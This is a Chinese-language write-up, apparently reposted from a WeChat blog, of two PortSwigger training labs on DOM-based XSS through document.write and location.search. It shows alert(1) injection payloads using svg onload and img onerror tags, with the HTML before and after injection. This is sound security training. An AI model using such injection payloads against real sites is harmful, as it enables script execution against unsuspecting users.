实验3:数据交换系统 在…中document.write 潜水机使用源location.search
1.构造payload进行弹窗
?"><svg onload=alert(1)>
(解析如下:
当这个SVG图像加载完成后,将触发JavaScript中的`alert(1)`,弹出一个包含数字1的警告框)
输入payload 11111111时:
<img src="/resources/images/tracker.gif?searchTerms=111111111">
=>
<img src="/resources/images/tracker.gif?searchTerms="><svg onload=alert(1)>">
实验10:数据交换系统 在…中document.write 潜水机使用源location.search 在一个选择元素中
1.构造payload进行弹窗
"></select><img src="1" onerror="alert(1)">
(解析如下:
当这个img图像加载完成后,错误弹出一个包含数字1的警告框)
输入payload 11111111时:
<select name="storeId">
<option selected="" >
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">111111111111111</font>
</option>
</select>
=>
<select name="storeId">
<option selected="" >
<font style="vertical-align: inherit;">"></select>
<img src="1" onerror="alert(1)">
</font>
</option>
</select>
原文始发于微信公众号(鲲哥的Bypass之旅):portswigger靶场-Lab3、10
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论